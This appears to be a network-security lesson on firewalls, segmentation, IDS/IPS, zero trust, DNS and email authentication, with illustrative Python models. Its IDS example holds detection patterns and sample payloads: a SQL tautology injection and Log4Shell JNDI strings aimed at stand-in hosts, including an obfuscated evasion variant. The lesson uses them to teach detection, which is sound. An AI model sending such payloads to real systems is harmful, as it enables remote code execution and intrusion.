6 min read·Lesson 5 of 10

Network Security and Zero Trust

Learn the controls that protect networks (firewalls, segmentation, IDS/IPS, VPN) and the modern zero-trust model that removes the idea of a trusted inside.

For decades, network security meant building a hard outer perimeter: firewalls at the edge, "trusted" networks inside. That model stopped matching reality with cloud, mobile, and remote work. This lesson covers both the classic controls (still widely deployed, and still necessary) and the zero-trust approach, which keeps those controls but demotes the perimeter from the boundary of trust to one layer among several.

Firewalls

A firewall enforces rules about what traffic can flow between networks. Generations:

Type | Inspects | Examples
Packet filter (stateless) | Source/destination IP, port and protocol of each packet in isolation | AWS network ACLs, iptables without conntrack
Stateful | Tracks connection state, so replies to an allowed connection are admitted without a rule of their own | nftables and iptables with conntrack, AWS Security Groups, almost every modern firewall
Application / Layer 7 | Understands HTTP, DNS, SMTP and can match on URLs, methods, headers | Web Application Firewall (WAF)
Next-Gen Firewall (NGFW) | Application identification plus user identity, threat intelligence and an inline IPS | Palo Alto, Fortinet, Check Point

In cloud, the equivalents are security groups (instance-level, stateful), network ACLs (subnet-level, stateless, on AWS), NSGs (Azure), and VPC firewall rules (GCP). The stateless/stateful distinction matters in practice: a network ACL needs an explicit rule for return traffic on ephemeral ports (1024-65535), which is a far wider opening than the single connection it is meant to let back in; a security group does not.
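The difference between a stateless ACL and a stateful firewall is easiest to see on a concrete packet sequence. The following is an added example written for this lesson, not code from any firewall product; the addresses, rules and packets are constructed, and the two decision procedures are a simplified model of network-ACL semantics (first matching rule wins, no memory between packets) and conntrack semantics (rules decide only whether a connection may open, replies ride on the state table).

```python
"""Stateless vs stateful filtering, as an added illustration.

The addresses, rules and packets below are constructed for the example; the
decision logic mirrors a stateless ACL (AWS network ACL: first matching rule
wins, no memory between packets) and a stateful firewall (security group,
nftables with conntrack: rules only decide whether a connection may open,
replies ride on the state table).
"""
from dataclasses import dataclass
from ipaddress import ip_address, ip_network


@dataclass(frozen=True)
class Packet:
    src: str
    dst: str
    sport: int
    dport: int
    syn: bool = False   # True for the first packet of a TCP connection


@dataclass(frozen=True)
class Rule:
    action: str         # "allow" or "deny"
    src: str            # CIDR
    dst: str            # CIDR
    dports: range       # destination port range

    def matches(self, p: Packet) -> bool:
        return (ip_address(p.src) in ip_network(self.src)
                and ip_address(p.dst) in ip_network(self.dst)
                and p.dport in self.dports)


def stateless_decide(rules, p: Packet, default="deny") -> str:
    """Network-ACL semantics: first matching rule wins, every packet is judged alone."""
    for r in rules:
        if r.matches(p):
            return r.action
    return default


class StatefulFirewall:
    """Conntrack semantics: rules are consulted only for connection-opening
    packets; packets belonging to a tracked connection are allowed, packets that
    are neither are INVALID and dropped."""

    def __init__(self, rules):
        self.rules = rules
        self.table = set()      # tracked connections as (src, sport, dst, dport)

    def decide(self, p: Packet) -> str:
        key = (p.src, p.sport, p.dst, p.dport)
        reverse = (p.dst, p.dport, p.src, p.sport)
        if key in self.table or reverse in self.table:
            return "allow"      # ESTABLISHED, in either direction
        if not p.syn:
            return "deny"       # INVALID: not a new connection, not a tracked one
        verdict = stateless_decide(self.rules, p)
        if verdict == "allow":
            self.table.add(key)
        return verdict


def run_demo() -> dict:
    client, server, other = "203.0.113.7", "10.0.1.10", "198.51.100.9"
    syn = Packet(client, server, 51000, 443, syn=True)     # client opens HTTPS
    reply = Packet(server, client, 443, 51000)             # server answers
    stray = Packet(other, server, 40000, 443)              # mid-stream packet, never saw a SYN
    exfil = Packet(server, other, 443, 4444, syn=True)     # server initiates outbound to a high port

    inbound_https = [Rule("allow", "0.0.0.0/0", "10.0.1.0/24", range(443, 444))]
    # The stateless fix for replies: allow the subnet to talk to any address on
    # ephemeral ports. Note how much that rule lets out.
    widened = inbound_https + [Rule("allow", "10.0.1.0/24", "0.0.0.0/0", range(1024, 65536))]
    fw = StatefulFirewall(inbound_https)

    return {
        "stateless_syn": stateless_decide(inbound_https, syn),       # allow
        "stateless_reply": stateless_decide(inbound_https, reply),   # deny: the reply has no rule
        "widened_reply": stateless_decide(widened, reply),           # allow
        "widened_exfil": stateless_decide(widened, exfil),           # allow: the price of statelessness
        "stateful_syn": fw.decide(syn),        # allow, and the connection is now tracked
        "stateful_reply": fw.decide(reply),    # allow via the state table, no extra rule
        "stateful_stray": fw.decide(stray),    # deny: INVALID
        "stateful_exfil": fw.decide(exfil),    # deny: no rule lets the server open this
    }


if __name__ == "__main__":
    for name, verdict in run_demo().items():
        print(f"{name:16} {verdict}")
```

The `widened_exfil` verdict is the point: to let replies back in, the stateless rule set had to allow the whole subnet to reach any address on any high port, which is exactly the outbound path a compromised server uses. The stateful firewall allows the same reply with no extra rule and still denies the server-initiated connection.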

Network Segmentation

Don't put everything on one flat network. Segment so that compromise of one host doesn't grant access to all the others. Common patterns:

  • VLANs / subnets — corporate, guest, IoT, server tiers each isolated
  • DMZ — public-facing services in a network zone separate from internal systems
  • Microsegmentation — per-workload firewall rules, often enforced by a software-defined network (NSX, Calico, Cilium)
  • Air-gapped networks — physical separation, used for OT/ICS and classified systems

The key principle: limit lateral movement. An attacker who lands on a developer laptop should not be able to reach production databases.
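A useful way to audit a segmentation design is to treat the allow rules as a graph and ask how many hops an attacker needs from a given starting zone to the crown jewels. The following is an added example for this lesson, not code from any product; the zones and rules are constructed, and the model is deliberately pessimistic (whoever lands in a zone is assumed to fully own it).

```python
"""Lateral-movement reachability from segmentation rules (added example).

Zones and allow rules are constructed. Anything not listed is denied by
default, as a segmented network should be.
"""
from collections import deque

SEGMENTED = [   # (source zone, destination zone, allowed ports)
    ("corp-laptops", "web-tier", {443}),
    ("corp-laptops", "jump-host", {22}),
    ("web-tier", "app-tier", {8080}),
    ("app-tier", "prod-db", {5432}),
    ("jump-host", "app-tier", {22}),
    ("jump-host", "prod-db", {5432}),   # "convenient" DBA shortcut
]
ZONES = ["guest-wifi", "corp-laptops", "web-tier", "app-tier", "jump-host", "prod-db"]


def flat_network(zones):
    """A flat network is equivalent to an allow-all rule between every pair of zones."""
    return [(a, b, {"any"}) for a in zones for b in zones if a != b]


def attack_paths(rules, start):
    """Breadth-first search over the allow graph. Models the pessimistic case
    that an attacker who lands in a zone fully owns it and can reach anything
    its rules allow, so the result is every zone reachable by lateral movement
    together with the shortest hop path to it."""
    adjacent = {}
    for src, dst, _ports in rules:
        adjacent.setdefault(src, set()).add(dst)
    paths = {start: [start]}
    queue = deque([start])
    while queue:
        zone = queue.popleft()
        for nxt in sorted(adjacent.get(zone, ())):
            if nxt not in paths:
                paths[nxt] = paths[zone] + [nxt]
                queue.append(nxt)
    return paths


def hops_to(rules, start, target):
    """Number of lateral hops from start to target, or None if unreachable."""
    path = attack_paths(rules, start).get(target)
    return None if path is None else len(path) - 1


def without(rules, src, dst):
    """The same rule set with one allow rule removed."""
    return [r for r in rules if (r[0], r[1]) != (src, dst)]


if __name__ == "__main__":
    cases = [("flat", flat_network(ZONES)),
             ("segmented", SEGMENTED),
             ("segmented, no jump->db", without(SEGMENTED, "jump-host", "prod-db"))]
    for label, rules in cases:
        path = attack_paths(rules, "corp-laptops").get("prod-db", ["unreachable"])
        print(f"{label:24} hops: {hops_to(rules, 'corp-laptops', 'prod-db')}  path: {' -> '.join(path)}")
    print("guest-wifi -> prod-db:", hops_to(SEGMENTED, "guest-wifi", "prod-db"))
```

On the flat network the laptop reaches the database in one hop. Segmentation does not make the database unreachable (the web path still exists, and it has to, or the application would not work), but it forces extra hops, each of which is a chance to detect the attacker; the search also surfaces the jump-host shortcut as the rule that most shortens the path, which is the one to remove or put behind stronger controls.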

IDS and IPS

  • Intrusion Detection System (IDS) — passively watches a copy of the traffic (span port, tap) and raises alerts. Snort, Suricata; Zeek is a network monitor that produces rich connection logs rather than signature alerts.
  • Intrusion Prevention System (IPS) — sits inline on the traffic path and blocks malicious traffic in real time. Snort and Suricata run in either mode; inline placement adds latency and a failure point, which is why many deployments start in detect mode.

Both rely on signatures (known bad patterns), anomaly detection (deviations from baseline), or both. False positives are the perennial challenge — too noisy and analysts ignore them; too quiet and real attacks slip through.
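Both detection styles, and both of their failure modes, can be shown on a handful of flow records. The following is an added example for this lesson, not code from Snort, Suricata or any other IDS; the flows, the baseline numbers and the three rules are constructed, and the rules are written in the spirit of a content/regex match rather than in any product's rule syntax.

```python
"""Signature and anomaly detection over constructed flow records (added example)."""
import re
import statistics
from dataclasses import dataclass


@dataclass(frozen=True)
class Flow:
    ts: int
    src: str
    dst: str
    dport: int
    bytes_out: int      # bytes sent by src
    payload: bytes      # first bytes of the stream


# (alert name, destination port or None for any port, pattern)
SIGNATURES = [
    ("sqli tautology", 80, re.compile(rb"(?i)'\s*or\s*'?1'?\s*=\s*'?1")),
    ("php webshell upload", 80, re.compile(rb"<\?php\s+(system|passthru|shell_exec)\(")),
    ("log4shell jndi lookup", None, re.compile(rb"\$\{jndi:(ldap|rmi|dns):")),
]


def signature_alerts(flows):
    """Known-bad patterns: precise and cheap, and blind to anything not in the list."""
    hits = []
    for f in flows:
        for name, port, pattern in SIGNATURES:
            if (port is None or f.dport == port) and pattern.search(f.payload):
                hits.append((f.ts, f.src, name))
    return hits


def anomaly_alerts(flows, baseline, k=3.0, ignore=frozenset()):
    """Deviation from a baseline: bytes_out beyond mean + k*stdev of a known-good
    period. `ignore` is the tuning knob for sources that are legitimately noisy
    (backup hosts), which is where the false positives come from."""
    threshold = statistics.fmean(baseline) + k * statistics.pstdev(baseline)
    return [(f.ts, f.src, "egress volume", f.bytes_out)
            for f in flows if f.src not in ignore and f.bytes_out > threshold]


# Constructed traffic. Per-flow egress bytes observed during a quiet hour:
BASELINE = [1200, 3400, 2100, 5000, 800, 4200, 2600, 3900]   # mean 2900, stdev about 1387

FLOWS = [
    Flow(1, "203.0.113.5", "10.0.1.10", 80, 800, b"GET /item?id=1' OR '1'='1 HTTP/1.1\r\n"),
    Flow(2, "203.0.113.5", "10.0.1.10", 443, 900, b"User-Agent: ${jndi:ldap://203.0.113.5/x}\r\n"),
    # Same attack with a nested lookup: slips past the literal signature (false negative).
    Flow(3, "203.0.113.6", "10.0.1.10", 443, 900, b"User-Agent: ${${lower:j}ndi:ldap://203.0.113.6/x}\r\n"),
    Flow(4, "10.0.2.20", "10.0.9.9", 22, 5_000_000, b""),             # nightly backup job (false positive)
    Flow(5, "10.0.1.10", "198.51.100.9", 443, 900_000, b"POST /up"),   # web server pushing data out
]


def run_demo():
    return {
        "signatures": signature_alerts(FLOWS),
        "anomalies": anomaly_alerts(FLOWS, BASELINE),
        "anomalies_tuned": anomaly_alerts(FLOWS, BASELINE, ignore={"10.0.2.20"}),
    }


if __name__ == "__main__":
    for kind, alerts in run_demo().items():
        print(kind)
        for alert in alerts:
            print("  ", alert)
```

Flow 3 is the signature engine's blind spot (the same exploit with trivial obfuscation), flow 4 is the anomaly engine's noise (a backup job that looks like exfiltration), and the `ignore` set is the kind of tuning that keeps analysts reading the alerts. Neither engine alone catches both flows 3 and 5, which is the argument for running both.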

DDoS Mitigation

Distributed denial-of-service attacks aim to exhaust bandwidth, connections, or compute. Defences:

  • Edge / CDN (Cloudflare, AWS Shield, Akamai) absorbs volumetric attacks across a global anycast network
  • Rate limiting per IP / per token at the application layer
  • SYN cookies and connection limits in the kernel (net.ipv4.tcp_syncookies=1 on Linux) so half-open connections cannot exhaust the backlog
  • Geo-blocking traffic from regions where you have no users; treat this as noise reduction rather than a control, since botnets are rented in every region

VPNs

A VPN creates an encrypted tunnel over an untrusted network. Two flavours:

  • Site-to-site — connects two networks (HQ to AWS VPC, two data centres). Usually IPsec.
  • Remote access — individual user device tunnels into the corporate network. OpenVPN, WireGuard, Cisco AnyConnect.

Traditional VPNs have a flaw: once you're "in", the network treats you as trusted. This is exactly what zero trust rejects.

Zero Trust

The zero-trust model assumes the network is hostile — even your own LAN. Every request, regardless of source, must be authenticated, authorized, and encrypted. The motto: "never trust, always verify".

Core tenets (NIST SP 800-207):

  1. All data sources and computing services are resources to be protected
  2. All communication is secured regardless of network location
  3. Access is granted per-session, not per-network-position
  4. Access is determined by dynamic policy: identity, device posture, location, behaviour
  5. The enterprise monitors and measures the integrity of all owned and associated assets
  6. Authentication and authorization are dynamic and strictly enforced before access
  7. The enterprise collects telemetry to improve security posture

Practical implementation usually combines:

  • Identity-aware proxy in front of every internal app (Cloudflare Access, Google IAP), or an identity-bound overlay network with per-user ACLs (Tailscale)
  • Device posture (managed, encrypted, patched) checked at every connection
  • Continuous authentication — re-evaluate access if context changes
  • mTLS between services so each end proves its identity to the other
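What "dynamic policy" and "per-session access" look like in a policy decision point is easier to see in code than in prose. The following is an added example for this lesson, not code from any ZTNA product; the apps, groups, posture thresholds and requests are constructed. The one thing to notice is what the decision never reads: the source address.

```python
"""A minimal zero-trust policy decision point (added example).

The policy table, devices and requests are constructed. Access is decided per
request from identity, entitlement and device posture; the source address is
recorded but never consulted.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class Device:
    serial: str
    managed: bool           # enrolled in MDM
    disk_encrypted: bool
    patch_age_days: int     # days since the last OS patch, as reported by the agent


@dataclass(frozen=True)
class Request:
    user: str
    groups: frozenset
    mfa: bool               # did the identity-provider session complete MFA
    device: Device          # posture as reported by the endpoint agent
    app: str
    source_ip: str          # logged for audit only, never a trust input


APP_POLICY = {   # constructed policy table: entitlement and posture floor per app
    "wiki":       {"groups": {"staff"}, "max_patch_age_days": 30},
    "prod-admin": {"groups": {"sre"},   "max_patch_age_days": 7},
}


def decide(req: Request):
    """Returns (allowed, reasons). Every failing check is reported so the user
    and the SOC see why; nothing here looks at req.source_ip."""
    pol = APP_POLICY.get(req.app)
    if pol is None:
        return False, ["unknown app"]
    reasons = []
    if not req.mfa:
        reasons.append("mfa required")
    if not (req.groups & pol["groups"]):
        reasons.append("user not entitled to app")
    dev = req.device
    if not dev.managed:
        reasons.append("unmanaged device")
    if not dev.disk_encrypted:
        reasons.append("disk not encrypted")
    if dev.patch_age_days > pol["max_patch_age_days"]:
        reasons.append("device patch age exceeds policy")
    return (not reasons), reasons


class Session:
    """A grant is bound to (user, device, app) and short-lived, and it is
    re-evaluated on every request with the current posture, so the session
    does not outlive the conditions that created it."""
    TTL = 600   # seconds

    def __init__(self, req: Request, now: int):
        allowed, reasons = decide(req)
        if not allowed:
            raise PermissionError(", ".join(reasons))
        self.binding = (req.user, req.device.serial, req.app)
        self.expires = now + self.TTL

    def authorize(self, req: Request, now: int):
        if now >= self.expires:
            return False, ["session expired; re-authenticate"]
        if (req.user, req.device.serial, req.app) != self.binding:
            return False, ["request does not match session binding"]
        return decide(req)


def run_demo() -> dict:
    good = Device("C02XYZ", managed=True, disk_encrypted=True, patch_age_days=3)
    byod = Device("unknown", managed=False, disk_encrypted=False, patch_age_days=90)
    sre = frozenset({"staff", "sre"})
    results = {}
    # On the office LAN, from an unmanaged laptop: denied regardless of location.
    results["lan_byod"] = decide(Request("alice", sre, True, byod, "prod-admin", "10.0.0.5"))
    # From a coffee shop, managed and patched device, MFA done: allowed.
    req = Request("alice", sre, True, good, "prod-admin", "203.0.113.7")
    results["remote_managed"] = decide(req)
    session = Session(req, now=0)
    # Mid-session the agent reports disk encryption off: access is withdrawn.
    degraded = Request("alice", sre, True, Device("C02XYZ", True, False, 3), "prod-admin", "203.0.113.7")
    results["posture_change"] = session.authorize(degraded, now=60)
    # The session token replayed from another device: the binding check fails.
    other = Request("alice", sre, True, Device("OTHER", True, True, 1), "prod-admin", "203.0.113.7")
    results["wrong_device"] = session.authorize(other, now=60)
    results["expired"] = session.authorize(req, now=601)
    return results


if __name__ == "__main__":
    for name, (allowed, reasons) in run_demo().items():
        print(f"{name:16} {'ALLOW' if allowed else 'DENY'} {reasons}")
```

In a real deployment `decide` would sit in an identity-aware proxy or ZTNA broker, the device fields would come from the MDM and endpoint agent rather than the request, and the proxy would forward only to the one application named in the grant, which is what distinguishes this from a VPN that drops the user onto a network.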

SASE and ZTNA

Secure Access Service Edge (SASE) bundles network and security at the cloud edge — SD-WAN, firewall-as-a-service, secure web gateway, CASB, ZTNA — replacing the traditional "MPLS to HQ to firewall" pattern. Zero Trust Network Access (ZTNA) is the access component: a cloud broker that authenticates the user, checks device posture, and proxies them to the specific app — no broad network access. Vendors: Cloudflare, Zscaler, Netskope, Palo Alto Prisma.

DNS Security

DNS is foundational and often overlooked:

  • DNSSEC signs records so resolvers can verify authenticity
  • DoH/DoT (DNS over HTTPS / TLS) encrypts DNS queries against eavesdropping
  • Protective DNS (Cloudflare 1.1.1.2, Quad9 9.9.9.9) refuses lookups of known-malicious domains; note that Cloudflare's plain 1.1.1.1 resolver does no filtering
  • Egress filtering — only allow DNS queries via your sanctioned resolver

Email Security

Email remains the #1 delivery vector for phishing. The trio of standards every domain owner should publish:

  • SPF — which mail servers are allowed to send for your domain
  • DKIM — outgoing messages are cryptographically signed by the sending mail server with a private key whose public half is published in DNS, so receivers can verify the message was not altered in transit
  • DMARC — policy for what receivers should do when SPF/DKIM fail (quarantine, reject) plus reporting

Without these, anyone can spoof your domain. Roll DMARC out in stages: start at p=none with rua reporting turned on, use the aggregate reports to find every legitimate sender (marketing platforms, ticketing systems, printers), fix their SPF/DKIM, then move to p=quarantine and finally p=reject.
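What a receiving mail server actually computes from those three records is small enough to write out. The following is an added example for this lesson, not code from any mail server or library; the TXT records are constructed, and the SPF evaluator implements only the ip4, ip6, include and all mechanisms plus the ten-lookup limit, returning permerror for anything else (a, mx, exists, redirect) rather than guessing.

```python
"""SPF evaluation and DMARC disposition against a constructed DNS table (added example)."""
from ipaddress import ip_address, ip_network

# Constructed DNS TXT data, keyed by name.
DNS_TXT = {
    "example.com": ["v=spf1 ip4:192.0.2.0/24 include:_spf.mailer.example -all"],
    "_spf.mailer.example": ["v=spf1 ip4:198.51.100.0/25 ip6:2001:db8:10::/48 -all"],
    "_dmarc.example.com": ["v=DMARC1; p=reject; sp=quarantine; pct=100; rua=mailto:dmarc@example.com"],
    "loop.example": ["v=spf1 include:loop.example -all"],   # pathological: would recurse forever
}

QUALIFIER = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}


def spf_check(domain, sender_ip, txt=DNS_TXT, lookups=None):
    """SPF result for sender_ip claiming to send mail as domain."""
    lookups = [0] if lookups is None else lookups     # one counter shared across includes
    records = [r for r in txt.get(domain, []) if r.startswith("v=spf1")]
    if not records:
        return "none"
    if len(records) > 1:
        return "permerror"                  # RFC 7208: more than one SPF record is an error
    for term in records[0].split()[1:]:
        qualifier = "+"
        if term[0] in QUALIFIER:
            qualifier, term = term[0], term[1:]
        name, _, arg = term.partition(":")
        if name == "all":
            matched = True
        elif name in ("ip4", "ip6"):
            matched = ip_address(sender_ip) in ip_network(arg, strict=False)
        elif name == "include":
            lookups[0] += 1
            if lookups[0] > 10:
                return "permerror"          # the 10-lookup limit; also what stops loops
            inner = spf_check(arg, sender_ip, txt, lookups)
            if inner in ("permerror", "none"):
                return "permerror"
            matched = inner == "pass"       # an include matches only when it passes
        else:
            return "permerror"              # mechanism not implemented in this example
        if matched:
            return QUALIFIER[qualifier]
    return "neutral"                        # ran off the end without an "all"


def dmarc_record(org_domain, txt=DNS_TXT):
    recs = [r for r in txt.get("_dmarc." + org_domain, []) if r.startswith("v=DMARC1")]
    if not recs:
        return None
    return dict(kv.strip().split("=", 1) for kv in recs[0].split(";") if "=" in kv)


def dmarc_disposition(from_domain, org_domain, spf_aligned_pass, dkim_aligned_pass, txt=DNS_TXT):
    """What a receiver does with a message whose From: is from_domain. DMARC
    passes if either SPF or DKIM passed *and* that result's domain aligns with
    From:; an SPF pass for some unrelated envelope domain does not count."""
    tags = dmarc_record(org_domain, txt)
    if tags is None:
        return "none"
    if spf_aligned_pass or dkim_aligned_pass:
        return "pass"
    if from_domain != org_domain and "sp" in tags:
        return tags["sp"]                   # subdomain policy
    return tags.get("p", "none")


if __name__ == "__main__":
    for ip in ("192.0.2.25", "198.51.100.10", "198.51.100.200", "2001:db8:10::5"):
        print(f"{ip:18} spf={spf_check('example.com', ip)}")
    print("loop.example:", spf_check("loop.example", "192.0.2.1"))
    print("spoofed example.com      ->", dmarc_disposition("example.com", "example.com", False, False))
    print("spoofed mail.example.com ->", dmarc_disposition("mail.example.com", "example.com", False, False))
    print("DKIM-signed example.com  ->", dmarc_disposition("example.com", "example.com", False, True))
```

The `loop.example` record shows why the lookup limit exists, and why a record stuffed with `include:` entries for every SaaS vendor eventually returns permerror and is ignored by receivers. The alignment flags in `dmarc_disposition` are the detail most often missed: SPF checks the envelope sender, DKIM the signing domain, and DMARC only counts a pass whose domain matches the visible From: header.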

Key Takeaways

  • Defence in depth on networks: perimeter firewall, segmentation, host firewalls, IDS/IPS, DNS filtering.
  • Network segmentation limits lateral movement — VLANs, security groups, microsegmentation.
  • IDS detects, IPS blocks; both can be signature- or anomaly-based.
  • VPNs provide encrypted tunnels (site-to-site, remote access); ZTNA replaces broad remote-access tunnels with brokered, per-application access, and SASE delivers that broker alongside the other edge controls.
  • Zero trust: never trust based on network location — always authenticate and authorize per request.
